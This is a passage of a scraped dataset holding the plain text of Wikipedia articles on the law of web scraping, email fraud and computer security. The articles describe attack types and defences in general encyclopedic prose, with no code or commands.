illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
342 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Data_scraping&id=1214697307&wpFormIdentifier=titleform | IMPORTANT NOTE: Most educators and professionals do not consider it appropriate to use tertiary sources such as encyclopedias as a sole source for any information—citing an encyclopedia as an important reference in footnotes or bibliographies may result in censure or a failing grade. Wikipedia articles should be used for background information, as a reference for correct terminology and search terms, and as a starting point for further research. As with any community-built reference, there is a possibility for error in Wikipedia's content—please check your facts against multiple sources and read our disclaimers for more information. Please remember to check your manual of style, standards guide or instructor's guidelines for the exact syntax to suit your needs. For more detailed advice, see Citing Wikipedia. Wikipedia contributors. (2024, March 20). Data scraping. In Wikipedia, The Free Encyclopedia. Retrieved 15:33, August 17, 2024, from https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307 Wikipedia contributors. "Data scraping. Wikipedia, The Free Encyclopedia. Wikipedia, The Free Encyclopedia, 20 Mar. 2024. Web. 17 Aug. 2024. Wikipedia contributors, 'Data scraping', Wikipedia, The Free Encyclopedia, 20 March 2024, 16:03 UTC, https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307 accessed 17 August 2024 Wikipedia contributors, "Data scraping, Wikipedia, The Free Encyclopedia, https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307 (accessed August 17, 2024). Wikipedia contributors. Data scraping Internet . Wikipedia, The Free Encyclopedia; 2024 Mar 20, 16:03 UTC cited 2024 Aug 17 . Available from: https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307. Data scraping, https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307 (last visited Aug. 17, 2024). Wikipedia contributors. Data scraping. Wikipedia, The Free Encyclopedia. March 20, 2024, 16:03 UTC. Available at: https: en.wikipedia.org w index.php?title Data scraping oldid 1214697307. Accessed August 17, 2024. When using the LaTeX package url ( usepackage url somewhere in the preamble), which tends to give much more nicely formatted web addresses, the following may be preferred: |
343 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Email_fraud | Email fraud (or email scam) is intentional deception for either personal gain or to damage another individual using email as the vehicle. Almost as soon as email became widely used, it began to be used as a means to defraud people, just as telephony and paper mail were used by previous generations. Email fraud can take the form of a confidence trick ("con game", "scam", etc.). Some confidence tricks tend to exploit the inherent greed and dishonesty of its victims. The prospect of a 'bargain' or 'something for nothing' can be very tempting. Email fraud, as with other "bunco schemes", usually targets na ve individuals who put their confidence in schemes to get rich quickly. These include 'too good to be true' investments or offers to sell popular items at 'impossibly low' prices. Another form of email fraud is an impersonation technique known as email spoofing: the recipient is misled by falsified origin information (From:) into making an anticipated payment into the fraudster's account rather than the correct one. The method is known as phishing or spear phishing: 'phishing' involves sending thousands of emails claiming, for example, that an account has been compromised; 'spear phishing' typically involves targeted and personalized emails or messages designed to deceive specific individuals or organizations into revealing sensitive information or performing malicious actions. 1 Email sent from someone pretending to be someone else is known as spoofing. Spoofing may take place in a number of ways. Common to all of them is that the actual sender's name and the origin of the message are concealed or masked from the recipient. Many instances of email fraud use at least spoofing, and as most frauds are clearly criminal acts, criminals typically try to avoid easy traceability. Phishing is a type of social engineering where an attacker sends a fraudulent (e.g., spoofed, fake, or otherwise deceptive) message designed to trick a person into revealing sensitive information to the attacker 2 3 or to deploy malicious software on the victim's infrastructure such as ransomware. Some spoof messages purport to be from an existing company, perhaps one with which the intended victim already has a business relationship. The 'bait' in this instance may appear to be a message from "the fraud department" of, for example, the victim's bank, which asks the customer to: "confirm their information"; "log in to their account"; "create a new password", or similar requests. Instead of being directed to the website they trust, they are referred to an identical looking page with a different URL. After entering their log-in details, their username and password is visible to the perpetrators. In many cases, phishing emails can appear to be benign - for example, a message prompting the receiver that they have a new friend request on a social media platform. Regardless of how innocent the message is in itself, it will always lead the victim to an imitation web page and false log-in prompt. In a study, researchers concluded that cognitive reflection and sensation-seeking tendencies are modest but significant predictors of susceptibility to phishing. 4 Additionally, participants who were pressured to make quick email legitimacy judgments made more errors. 4 Email solicitations to purchase goods or services may be instances of attempted fraud. The fraudulent offer typically features a popular item or service, at a drastically reduced price. Items may be offered in advance of their actual availability. For instance, the latest video game may be offered prior to its release, but at a similar price to a normal sale. In this case, the "greed factor" is the desire to get something that nobody else has, and before everyone else can get it, rather than a reduction in price. Of course, the item is never delivered, as it was not a legitimate offer in the first place. Such an offer may even be no more than a phishing attempt to obtain the victim's credit card information, with the intent of using the information to fraudulently obtain goods or services, paid for by the hapless victim, who may not know they were scammed until their credit card has been "used up. The "request for help" type of email fraud takes this form: an email is sent requesting help in some way. However, a reward is included for this help, which acts as a "hook". The reward may be a large amount of money, a treasure, or some artifact of supposedly great value. This type of scam has existed at least since the Renaissance, known as the "Spanish Prisoner" or "Turkish Prisoner" scam. In its original form, this scheme has the con man purport to be in correspondence with a wealthy person who has been imprisoned under a false identity and is relying on the confidence artist to raise money to secure his release. The con man tells the "mark" (victim) that he is "allowed" to supply money, for which he should expect a generous reward when the prisoner returns. The confidence artist claims to have chosen the victim for their reputation for honesty. Due to the widespread use of web bugs in email, simply opening an email can potentially alert the sender that the address to which the email is sent is a valid address. This can also happen when the mail is 'reported' as spam, in some cases: if the email is forwarded for inspection, and opened, the sender will be notified in the same way as if the addressee opened it. Email fraud may be avoided by: Many frauds go unreported to authorities, due to feelings of shame, guilt, or embarrassment. |
344 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_security | Computer security (also cybersecurity, digital security, or information technology (IT) security) is the protection of computer software, systems and networks from threats that may result in unauthorized information disclosure, theft of (or damage to) hardware, software, or data, as well as from the disruption or misdirection of the services they provide. 1 2 The field is significant due to the expanded reliance on computer systems, the Internet, 3 and wireless network standards. It is also significant due to the growth of smart devices, including smartphones, televisions, and the various devices that constitute the Internet of things (IoT). Cybersecurity is one of the most significant new challenges facing the contemporary world, due to both the complexity of information systems and the societies they support. Security is of especially high importance for systems that govern large-scale systems with far-reaching physical effects, such as power distribution, elections, and finance. 4 5 While many aspects of computer security involve digital security such as electronic passwords and encryption, physical security measures such as metal locks are still used to prevent unauthorized tampering. IT security is not a perfect subset of information security, thus does not fit completely into the security convergence schema. A vulnerability refers to a flaw in the structure, execution, functioning, or internal oversight of a computer or system that compromises its security. Most of the vulnerabilities that have been discovered are documented in the Common Vulnerabilities and Exposures (CVE) database. 6 An exploitable vulnerability is one for which at least one working attack or exploit exists. 7 Actors maliciously seeking vulnerabilities are known as threats. Vulnerabilities can be researched, reverse-engineered, hunted, or exploited using automated tools or customized scripts. 8 9 Various people or parties are vulnerable to cyber attacks; however, different groups are likely to experience different types of attacks more than others. 10 In April 2023, the United Kingdom Department for Science, Innovation Technology released a report on cyber attacks over the last 12 months. 11 They surveyed 2,263 UK businesses, 1,174 UK registered charities, and 554 education institutions. The research found that "32% of businesses and 24% of charities overall recall any breaches or attacks from the last 12 months. These figures were much higher for "medium businesses (59%), large businesses (69%), and high-income charities with 500,000 or more in annual income (56%). 11 Yet, although medium or large businesses are more often the victims, since larger companies have generally improved their security over the last decade, small and midsize businesses (SMBs) have also become increasingly vulnerable as they often "do not have advanced tools to defend the business. 10 SMBs are most likely to be affected by malware, ransomware, phishing, man-in-the-middle attacks, and Denial-of Service (DoS) Attacks. 10 Normal internet users are most likely to be affected by untargeted cyberattacks. 12 These are where attackers indiscriminately target as many devices, services, or users as possible. They do this using techniques that take advantage of the openness of the Internet. These strategies mostly include phishing, ransomware, water holing and scanning. 12 To secure a computer system, it is important to understand the attacks that can be made against it, and these threats can typically be classified into one of the following categories: A backdoor in a computer system, a cryptosystem, or an algorithm is any secret method of bypassing normal authentication or security controls. These weaknesses may exist for many reasons, including original design or poor configuration. 13 Due to the nature of backdoors, they are of greater concern to companies and databases as opposed to individuals. Backdoors may be added by an authorized party to allow some legitimate access or by an attacker for malicious reasons. Criminals often use malware to install backdoors, giving them remote administrative access to a system. 14 Once they have access, cybercriminals can "modify files, steal personal information, install unwanted software, and even take control of the entire computer. 14 Backdoors can be very hard to detect and are usually discovered by someone who has access to the application source code or intimate knowledge of the operating system of the computer. Denial-of-service attacks (DoS) are designed to make a machine or network resource unavailable to its intended users. 15 Attackers can deny service to individual victims, such as by deliberately entering a wrong password enough consecutive times to cause the victim's account to be locked, or they may overload the capabilities of a machine or network and block all users at once. While a network attack from a single IP address can be blocked by adding a new firewall rule, many forms of distributed denial-of-service (DDoS) attacks are possible, where the attack comes from a large number of points. In this case, defending against these attacks is much more difficult. Such attacks can originate from the zombie computers of a botnet or from a range of other possible techniques, including distributed reflective denial-of-service (DRDoS), where innocent systems are fooled into sending traffic to the victim. 15 With such attacks, the amplification factor makes the attack easier for the attacker because they have to use little bandwidth themselves. To understand why attackers may carry out these attacks, see the 'attacker motivation' section. A direct-access attack is when an unauthorized user (an attacker) gains physical access to a computer, most likely to directly copy data from it or steal information. 16 Attackers may also compromise security by making operating system modifications, installing software worms, keyloggers, covert listening devices or using wireless microphones. Even when the system is protected by standard security measures, these may be bypassed by booting another operating system or tool from a CD-ROM or other bootable media. Disk encryption and the Trusted Platform Module standard are designed to prevent these attacks. Direct service attackers are related in concept to direct memory attacks which allow an attacker to gain direct access to a computer's memory. 17 The attacks "take advantage of a feature of modern computers that allows certain devices, such as external hard drives, graphics cards, or network cards, to access the computer's memory directly. 17 Eavesdropping is the act of surreptitiously listening to a private computer conversation (communication), usually between hosts on a network. It typically occurs when a user connects to a network where traffic is not secured or encrypted and sends sensitive business data to a colleague, which, when listened to by an attacker, could be exploited. 18 Data transmitted across an "open network" allows an attacker to exploit a vulnerability and intercept it via various methods. Unlike malware, direct-access attacks, or other forms of cyber attacks, eavesdropping attacks are unlikely to negatively affect the performance of networks or devices, making them difficult to notice. 18 In fact, "the attacker does not need to have any ongoing connection to the software at all. The attacker can insert the software onto a compromised device, perhaps by direct insertion or perhaps by a virus or other malware, and then come back some time later to retrieve any data that is found or trigger the software to send the data at some determined time. 19 Using a virtual private network (VPN), which encrypts data between two points, is one of the most common forms of protection against eavesdropping. Using the best form of encryption possible for wireless networks is best practice, as well as using HTTPS instead of an unencrypted HTTP. 20 Programs such as Carnivore and NarusInSight have been used by the Federal Bureau of Investigation (FBI) and NSA to eavesdrop on the systems of internet service providers. Even machines that operate as a closed system (i.e., with no contact with the outside world) can be eavesdropped upon by monitoring the faint electromagnetic transmissions generated by the hardware. TEMPEST is a specification by the NSA referring to these attacks. Malicious software (malware) is any software code or computer program "intentionally written to harm a computer system or its users. 21 Once present on a computer, it can leak sensitive details such as personal information, business information and passwords, can give control of the system to the attacker, and can corrupt or delete data permanently. 22 Another type of malware is ransomware, which is when "malware installs itself onto a victim's machine, encrypts their files, and then turns around and demands a ransom (usually in Bitcoin) to return that data to the user. 23 Types of malware include some of the following: Man-in-the-middle attacks (MITM) involve a malicious attacker trying to intercept, surveil or modify communications between two parties by spoofing one or both party's identities and injecting themselves in-between. 24 Types of MITM attacks include: Surfacing in 2017, a new class of multi-vector, 25 polymorphic 26 cyber threats combine several types of attacks and change form to avoid cybersecurity controls as they spread. Multi-vector polymorphic attacks, as the name describes, are both multi-vectored and polymorphic. 27 Firstly, they are a singular attack that involves multiple methods of attack. In this sense, they are “multi-vectored (i.e. the attack can use multiple means of propagation such as via the Web, email and applications. However, they are also multi-staged, meaning that “they can infiltrate networks and move laterally inside the network. 27 The attacks can be polymorphic, meaning that the cyberattacks used such as viruses, worms or trojans “constantly change (“morph”) making it nearly impossible to detect them using signature-based defences. 27 Phishing is the attempt of acquiring sensitive information such as usernames, passwords, and credit card details directly from users by deceiving the users. 28 Phishing is typically carried out by email spoofing, instant messaging, text message, or on a phone call. They often direct users to enter details at a fake website whose look and feel are almost identical to the legitimate one. 29 The fake website often asks for personal information, such as login details and passwords. This information can then be used to gain access to the individual's real account on the real website. Preying on a victim's trust, phishing can be classified as a form of social engineering. Attackers can use creative ways to gain access to real accounts. A common scam is for attackers to send fake electronic invoices 30 to individuals showing that they recently purchased music, apps, or others, and instructing them to click on a link if the purchases were not authorized. A more strategic type of phishing is spear-phishing which leverages personal or organization-specific details to make the attacker appear like a trusted source. Spear-phishing attacks target specific individuals, rather than the broad net cast by phishing attempts. 31 Privilege escalation describes a situation where an attacker with some level of restricted access is able to, without authorization, elevate their privileges or access level. 32 For example, a standard computer user may be able to exploit a vulnerability in the system to gain access to restricted data; or even become root and have full unrestricted access to a system. The severity of attacks can range from attacks simply sending an unsolicited email to a ransomware attack on large amounts of data. Privilege escalation usually starts with social engineering techniques, often phishing. 32 Privilege escalation can be separated into two strategies, horizontal and vertical privilege escalation: Any computational system affects its environment in some form. This effect it has on its environment can range from electromagnetic radiation, to residual effect on RAM cells which as a consequence make a Cold boot attack possible, to hardware implementation faults that allow for access and or guessing of other values that normally should be inaccessible. In Side-channel attack scenarios, the attacker would gather such information about a system or network to guess its internal state and as a result access the information which is assumed by the victim to be secure. Social engineering, in the context of computer security, aims to convince a user to disclose secrets such as passwords, card numbers, etc. or grant physical access by, for example, impersonating a senior executive, bank, a contractor, or a customer. 33 This generally involves exploiting people's trust, and relying on their cognitive biases. A common scam involves emails sent to accounting and finance department personnel, impersonating their CEO and urgently requesting some action. One of the main techniques of social engineering are phishing attacks. In early 2016, the FBI reported that such business email compromise (BEC) scams had cost US businesses more than $2 billion in about two years. 34 In May 2016, the Milwaukee Bucks NBA team was the victim of this type of cyber scam with a perpetrator impersonating the team's president Peter Feigin, resulting in the handover of all the team's employees' 2015 W 2 tax forms. 35 Spoofing is an act of pretending to be a valid entity through the falsification of data (such as an IP address or username), in order to gain access to information or resources that one is otherwise unauthorized to obtain. Spoofing is closely related to phishing. 36 37 There are several types of spoofing, including: In 2018, the cybersecurity firm Trellix published research on the life-threatening risk of spoofing in the healthcare industry. 39 Tampering describes a malicious modification or alteration of data. It is an intentional but unauthorized act resulting in the modification of a system, components of systems, its intended behavior, or data. So-called Evil Maid attacks and security services planting of surveillance capability into routers are examples. 40 HTML smuggling allows an attacker to "smuggle" a malicious code inside a particular HTML or web page. 41 HTML files can carry payloads concealed as benign, inert data in order to defeat content filters. These payloads can be reconstructed on the other side of the filter. 42 When a target user opens the HTML, the malicious code is activated; the web browser then "decodes" the script, which then unleashes the malware onto the target's device. 41 Employee behavior can have a big impact on information security in organizations. Cultural concepts can help different segments of the organization work effectively or work against effectiveness toward information security within an organization. Information security culture is the ...totality of patterns of behavior in an organization that contributes to the protection of information of all kinds. 43 Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes. 44 Indeed, the Verizon Data Breach Investigations Report 2020, which examined 3,950 security breaches, discovered 30% of cybersecurity incidents involved internal actors within a company. 45 Research shows information security culture needs to be improved continuously. In "Information Security Culture from Analysis to Change", authors commented, "It's a never-ending process, a cycle of evaluation and change or maintenance. To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation. 46 In computer security, a countermeasure is an action, device, procedure or technique that reduces a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken. 47 48 49 Some common countermeasures are listed in the following sections: Security by design, or alternately secure by design, means that the software has been designed from the ground up to be secure. In this case, security is considered a main feature. The UK government's National Cyber Security Centre separates secure cyber design principles into five sections: 50 These design principles of security by design can include some of the following techniques: Security architecture can be defined as the "practice of designing computer systems to achieve security goals. 51 These goals have overlap with the principles of "security by design" explored above, including to "make initial compromise of the system difficult, and to "limit the impact of any compromise. 51 In practice, the role of a security architect would be to ensure the structure of a system reinforces the security of the system, and that new changes are safe and meet the security requirements of the organization. 52 53 Similarly, Techopedia defines security architecture as "a unified security design that addresses the necessities and potential risks involved in a certain scenario or environment. It also specifies when and where to apply security controls. The design process is generally reproducible. The key attributes of security architecture are: 54 Practicing security architecture provides the right foundation to systematically address business, IT and security concerns in an organization. A state of computer security is the conceptual ideal, attained by the use of three processes: threat prevention, detection, and response. These processes are based on various policies and system components, which include the following: Today, computer security consists mainly of preventive measures, like firewalls or an exit procedure. A firewall can be defined as a way of filtering network data between a host or a network and another network, such as the Internet. They can be implemented as software running on the machine, hooking into the network stack (or, in the case of most UNIX-based operating systems such as Linux, built into the operating system kernel) to provide real-time filtering and blocking. 55 Another implementation is a so-called physical firewall, which consists of a separate machine filtering network traffic. Firewalls are common amongst machines that are permanently connected to the Internet. Some organizations are turning to big data platforms, such as Apache Hadoop, to extend data accessibility and machine learning to detect advanced persistent threats. 57 In order to ensure adequate security, the confidentiality, integrity and availability of a network, better known as the CIA triad, must be protected and is considered the foundation to information security. 58 To achieve those objectives, administrative, physical and technical security measures should be employed. The amount of security afforded to an asset can only be determined when its value is known. 59 Vulnerability management is the cycle of identifying, fixing or mitigating vulnerabilities, 60 especially in software and firmware. Vulnerability management is integral to computer security and network security. Vulnerabilities can be discovered with a vulnerability scanner, which analyzes a computer system in search of known vulnerabilities, 61 such as open ports, insecure software configuration, and susceptibility to malware. In order for these tools to be effective, they must be kept up to date with every new update the vendor release. Typically, these updates will scan for the new vulnerabilities that were introduced recently. Beyond vulnerability scanning, many organizations contract outside security auditors to run regular penetration tests against their systems to identify vulnerabilities. In some sectors, this is a contractual requirement. 62 The act of assessing and reducing vulnerabilities to cyber attacks is commonly referred to as information technology security assessments. They aim to assess systems for risk and to predict and test for their vulnerabilities. While formal verification of the correctness of computer systems is possible, 63 64 it is not yet common. Operating systems formally verified include seL4, 65 and SYSGO's PikeOS 66 67 but these make up a very small percentage of the market. It is possible to reduce an attacker's chances by keeping systems up to date with security patches and updates and or hiring people with expertise in security. Large companies with significant threats can hire Security Operations Centre (SOC) Analysts. These are specialists in cyber defences, with their role ranging from "conducting threat analysis to investigating reports of any new issues and preparing and testing disaster recovery plans. 68 Whilst no measures can completely guarantee the prevention of an attack, these measures can help mitigate the damage of possible attacks. The effects of data loss damage can be also reduced by careful backing up and insurance. Outside of formal assessments, there are various methods of reducing vulnerabilities. Two factor authentication is a method for mitigating unauthorized access to a system or sensitive information. 69 It requires something you know: a password or PIN, and something you have: a card, dongle, cellphone, or another piece of hardware. This increases security as an unauthorized person needs both of these to gain access. Protecting against social engineering and direct computer access (physical) attacks can only happen by non-computer means, which can be difficult to enforce, relative to the sensitivity of the information. Training is often involved to help mitigate this risk by improving people's knowledge of how to protect themselves and by increasing people's awareness of threats. 70 However, even in highly disciplined environments (e.g. military organizations), social engineering attacks can still be difficult to foresee and prevent. Inoculation, derived from inoculation theory, seeks to prevent social engineering and other fraudulent tricks and traps by instilling a resistance to persuasion attempts through exposure to similar or related attempts. 71 Hardware-based or assisted computer security also offers an alternative to software-only computer security. Using devices and methods such as dongles, trusted platform modules, intrusion-aware cases, drive locks, disabling USB ports, and mobile-enabled access may be considered more secure due to the physical access (or sophisticated backdoor access) required in order to be compromised. Each of these is covered in more detail below. One use of the term computer security refers to technology that is used to implement secure operating systems. Using secure operating systems is a good way of ensuring computer security. These are systems that have achieved certification from an external security-auditing organization, the most popular evaluations are Common Criteria (CC). 85 In software engineering, secure coding aims to guard against the accidental introduction of security vulnerabilities. It is also possible to create software designed from the ground up to be secure. Such systems are secure by design. Beyond this, formal verification aims to prove the correctness of the algorithms underlying a system; 86 important for cryptographic protocols for example. Within computer systems, two of the main security models capable of enforcing privilege separation are access control lists (ACLs) and role-based access control (RBAC). An access-control list (ACL), with respect to a computer file system, is a list of permissions associated with an object. An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects. Role-based access control is an approach to restricting system access to authorized users, 87 88 89 used by the majority of enterprises with more than 500 employees, 90 and can implement mandatory access control (MAC) or discretionary access control (DAC). A further approach, capability-based security has been mostly restricted to research operating systems. Capabilities can, however, also be implemented at the language level, leading to a style of programming that is essentially a refinement of standard object-oriented design. An open-source project in the area is the E language. The end-user is widely recognized as the weakest link in the security chain 91 and it is estimated that more than 90% of security incidents and breaches involve some kind of human error. 92 93 Among the most commonly recorded forms of errors and misjudgment are poor password management, sending emails containing sensitive data and attachments to the wrong recipient, the inability to recognize misleading URLs and to identify fake websites and dangerous email attachments. A common mistake that users make is saving their user id password in their browsers to make it easier to log in to banking sites. This is a gift to attackers who have obtained access to a machine by some means. The risk may be mitigated by the use of two-factor authentication. 94 As the human component of cyber risk is particularly relevant in determining the global cyber risk 95 an organization is facing, security awareness training, at all levels, not only provides formal compliance with regulatory and industry mandates but is considered essential 96 in reducing cyber risk and protecting individuals and companies from the great majority of cyber threats. The focus on the end-user represents a profound cultural change for many security practitioners, who have traditionally approached cybersecurity exclusively from a technical perspective, and moves along the lines suggested by major security centers 97 to develop a culture of cyber awareness within the organization, recognizing that a security-aware user provides an important line of defense against cyber attacks. Related to end-user training, digital hygiene or cyber hygiene is a fundamental principle relating to information security and, as the analogy with personal hygiene shows, is the equivalent of establishing simple routine measures to minimize the risks from cyber threats. The assumption is that good cyber hygiene practices can give networked users another layer of protection, reducing the risk that one vulnerable node will be used to either mount attacks or compromise another node or network, especially from common cyberattacks. 98 Cyber hygiene should also not be mistaken for proactive cyber defence, a military term. 99 The most common acts of digital hygiene can include updating malware protection, cloud back-ups, passwords, and ensuring restricted admin rights and network firewalls. 100 As opposed to a purely technology-based defense against threats, cyber hygiene mostly regards routine measures that are technically simple to implement and mostly dependent on discipline 101 or education. 102 It can be thought of as an abstract list of tips or measures that have been demonstrated as having a positive effect on personal and or collective digital security. As such, these measures can be performed by laypeople, not just security experts. Cyber hygiene relates to personal hygiene as computer viruses relate to biological viruses (or pathogens). However, while the term computer virus was coined almost simultaneously with the creation of the first working computer viruses, 103 the term cyber hygiene is a much later invention, perhaps as late as 2000 104 by Internet pioneer Vint Cerf. It has since been adopted by the Congress 105 and Senate of the United States, 106 the FBI, 107 EU institutions 98 and heads of state. 99 Responding to attempted security breaches is often very difficult for a variety of reasons, including: Where an attack succeeds and a breach occurs, many jurisdictions now have in place mandatory security breach notification laws. The growth in the number of computer systems and the increasing reliance upon them by individuals, businesses, industries, and governments means that there are an increasing number of systems at risk. The computer systems of financial regulators and financial institutions like the U.S. Securities and Exchange Commission, SWIFT, investment banks, and commercial banks are prominent hacking targets for cybercriminals interested in manipulating markets and making illicit gains. 108 Websites and apps that accept or store credit card numbers, brokerage accounts, and bank account information are also prominent hacking targets, because of the potential for immediate financial gain from transferring money, making purchases, or selling the information on the black market. 109 In-store payment systems and ATMs have also been tampered with in order to gather customer account data and PINs. The UCLA Internet Report: Surveying the Digital Future (2000) found that the privacy of personal data created barriers to online sales and that more than nine out of 10 internet users were somewhat or very concerned about credit card security. 110 The most common web technologies for improving security between browsers and websites are named SSL (Secure Sockets Layer), and its successor TLS (Transport Layer Security), identity management and authentication services, and domain name services allow companies and consumers to engage in secure communications and commerce. Several versions of SSL and TLS are commonly used today in applications such as web browsing, e-mail, internet faxing, instant messaging, and VoIP (voice-over-IP). There are various interoperable implementations of these technologies, including at least one implementation that is open source. Open source allows anyone to view the application's source code, and look for and report vulnerabilities. The credit card companies Visa and MasterCard cooperated to develop the secure EMV chip which is embedded in credit cards. Further developments include the Chip Authentication Program where banks give customers hand-held card readers to perform online secure transactions. Other developments in this arena include the development of technology such as Instant Issuance which has enabled shopping mall kiosks acting on behalf of banks to issue on-the-spot credit cards to interested customers. Computers control functions at many utilities, including coordination of telecommunications, the power grid, nuclear power plants, and valve opening and closing in water and gas networks. The Internet is a potential attack vector for such machines if connected, but the Stuxnet worm demonstrated that even equipment controlled by computers not connected to the Internet can be vulnerable. In 2014, the Computer Emergency Readiness Team, a division of the Department of Homeland Security, investigated 79 hacking incidents at energy companies. 111 The aviation industry is very reliant on a series of complex systems which could be attacked. 112 A simple power outage at one airport can cause repercussions worldwide, 113 much of the system relies on radio transmissions which could be disrupted, 114 and controlling aircraft over oceans is especially dangerous because radar surveillance only extends 175 to 225 miles offshore. 115 There is also potential for attack from within an aircraft. 116 Implementing fixes in aerospace systems poses a unique challenge because efficient air transportation is heavily affected by weight and volume. Improving security by adding physical devices to airplanes could increase their unloaded weight, and could potentially reduce cargo or passenger capacity. 117 In Europe, with the (Pan-European Network Service) 118 and NewPENS, 119 and in the US with the NextGen program, 120 air navigation service providers are moving to create their own dedicated networks. 